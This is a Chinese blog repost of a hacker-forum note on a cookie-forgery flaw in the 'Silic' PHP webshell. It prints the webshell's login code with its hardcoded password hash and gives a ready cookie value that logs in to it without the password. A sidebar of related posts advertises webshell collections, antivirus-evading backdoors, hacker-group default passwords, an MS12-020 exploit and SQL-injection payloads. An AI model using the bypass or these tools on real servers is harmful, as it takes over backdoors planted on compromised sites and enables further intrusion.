Silic PHP大马Cookie欺骗漏洞

最新推荐文章于 2021-03-26 06:41:24 发布
最新推荐文章于 2021-03-26 06:41:24 发布
阅读量349 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/hookjoy/p/3601438.html
版权 
$password="ebd9a3c106064a255aaee28b6eb4f21c"; 

if($_COOKIE['admin_silicpass'] != md5($password)) //如果cookie 里面的admin_silicpass 不等于  md5($password)
{
        ob_start();
        $MSG_TOP = 'LOGIN';
        if(isset($passt))
        {
                $cookietime = time() + 24 * 3600;
                setcookie('admin_silicpass',md5($passt),$cookietime); //问题就是这里  知道了cookied 计算方法完全可以伪造 
                if(md5($passt) == md5($password)){die('<meta http-equiv="refresh" content="1;URL=?">');} //看这行 也就是说 $password == $passt 而$password 我们又是知道的 所以就呵呵了
                else{$MSG_TOP = 'PASS IS FALSE';}
        }
Root_Login($MSG_TOP);
ob_end_flush();
exit;
}

更加这个$password
设置cookie admin_silicpass=b571a9d50cea9d7962781be88992b52a 免密码直接登录了

漏洞比较鸡肋,但不是没用,所以记录下。

https://www.t00ls.net/thread-26062-1-1.html

转载于:https://www.cnblogs.com/hookjoy/p/3601438.html

weixin_34409357
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Silic
03-28
"Silic",这个名字可能指的是硅胶,一种广泛应用于各个领域的合成材料。硅胶是由硅元素与氧元素结合形成的无机化合物,具有优异的耐热性、耐寒性、化学稳定性以及良好的电绝缘性能。在IT行业中,硅胶有着诸多应用。 ...
silic0n64.github.io
02-09
【标题】"silic0n64.github.io" 指的是一个个人或组织在GitHub上托管的网页项目。在GitHub上,用户可以创建并分享自己的网页,通常用于展示个人作品、博客或者开源项目的文档。这个项目的名字可能是该用户的GitHub...
silic php 马,Silic PHP大马Cookie欺骗漏洞
weixin_31653131的博客
03-26 207
$password="ebd9a3c106064a255aaee28b6eb4f21c";if($_COOKIE['admin_silicpass'] != md5($password)) //如果cookie 里面的admin_silicpass 不等于 md5($password){ob_start();$MSG_TOP = 'LOGIN';if(isset($passt)){$cookie...
手机连接php大马,习科大马 v5.6
weixin_34151005的博客
03-10 596
Silic Webshell V5.6 使用手册Silic Group Hacker Army后门管理程序欢迎使用Silic Group Hacker Army开发的Web安全测试程序本程序基于php开发和运行,代码行数2210 lines, 程序大小135KB(占用空间136KB),本程序未加密,无后门。请将本脚本置于支持php的目录并访问运行,默认密码Silic,首字母大写。目录1)主界面-...
silic php 马,webshell/php at master · ailtex/webshell · GitHub
weixin_32384503的博客
03-26 261
另外的一个php webshell 收集项目~hihiAuthor:JohnTroony_oo0oo_08888888088" . "88(| -_- |)0\ = /0___/'---'\___.' \\| |// './ \\||| : |||// \/_ ||||| -:- |||||- \| | \\\ - /// | || \_| ''\---/'' |_/ ...
silic group第五版php木马,php一句话后门特征码与免杀-zz
weixin_32192627的博客
03-12 465
作者:YoCo Smart来自:Silic Group Hacker Army [BlackBap.Org]首先我们要明白什么是一句话木马。“一句话”是一种特征性很强的脚本后门的统称和简称,其特征就是代码很短,短到甚至只有一句话,但是却能用这句很短的代码,完成无数的复杂功能。我们来对下面这样的一个一句话进行简单剖析:复制代码这是php的一句话后门中最普遍的一种。它的工作原理是这样的:首先存在一个变...
silic group第五版php木马,::Silic Group Hacker Army PHP webshell - blackbap.org::
weixin_39724889的博客
03-12 350
$prompt view file/foldernamesizeowner:grouppermsmodifiedactions "; if($tree > 2) for($i=0;$i : ".$group['name']; } else { $owner = $user; } $buff .= "LINK".$owner."".get_perms($pwd)."".date("d-M-Y...
Silic_Security_Handbook
02-17
习科论坛的安全白皮书,适合安全技术人员进行网站日志分析,工具使用的入门书籍
过waf免杀大马最新版.zip
08-21
3. **PHP与ASP**:"silic.php"和"免杀.php"是PHP后门,而其他文件如".asp"则表明是ASP后门。PHP和ASP都是Web开发常用的脚本语言,黑客利用它们创建后门是因为这两种语言的广泛使用和强大的功能,使得后门更容易融入...
SQL_自学指南_Silic
06-21
一个不错的习科sql自学指南 精选于习科论坛,学完你就是手注高手。
Hacker——渗透技术
07-02
第1章 基础知识 第2章 缓冲区溢出利用技术 第3章 shellcode技术 ……
Chinese Shit Silic Group修正版 MS12-02 Exp
04-25
#!/usr/bin/env python # ms12-020 "chinese shit" PoC v2 (wireshark版) # 测试平台:win sp3(西班牙语), 据反馈Win7和win 2008也同样可用 # Silic Group - 技术自由 技术创新 技术共享 技术原创 技术进步 # BlackBap.Org # Win7_x64_sp1/Win_xp_sp3 bug修正 添加time.sleep # Silic Group Hacker Army exp好了 在cmd里 cssg.exe ip 即可
各大组织大马默认密码
05-09
各大组织大马默认密码,有学习攻防的朋友可以下载参考,渗透的朋友可以下载看看!
php大马(webshell)
05-26
增加了到达部分敏感目录的快捷链接。除了登录密码部分,其它所有代码已经过base64_decode加密(免杀性能好),请自行修改$admin['pass']处的登录密码。由于此php大马的功能过于强大,请勿用于非法用途。
[Silic]国外注入帝
weixin_30858241的博客
10-27 111
视频地址: http://pan.baidu.com/s/1ntE68Tb 代码: concat(0x3c7363726970743e6e616d653d70726f6d70742822506c6561736520456e74657220596f7572204e616d65203a2022293b2075726c3d70726f6d70742822506c6561736520456...
再谈联合查询注入字段间编码不同无法显示内容问题
kuxing100的专栏
04-19 671
作者:小D 来自:Silic Group Hacker Army 转载请注明:http://blackbap.org 首先我们来看这样的一个文章:简单搞定联合查询注入字段间编码不同无法显示内容问题 http://bbs.blackbap.org/thread-1646-1-1.html 这种EUC日本语言的网站用hex无可非议,但是如果遇到utf-8编码和lang=en啊西欧啊什么的

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值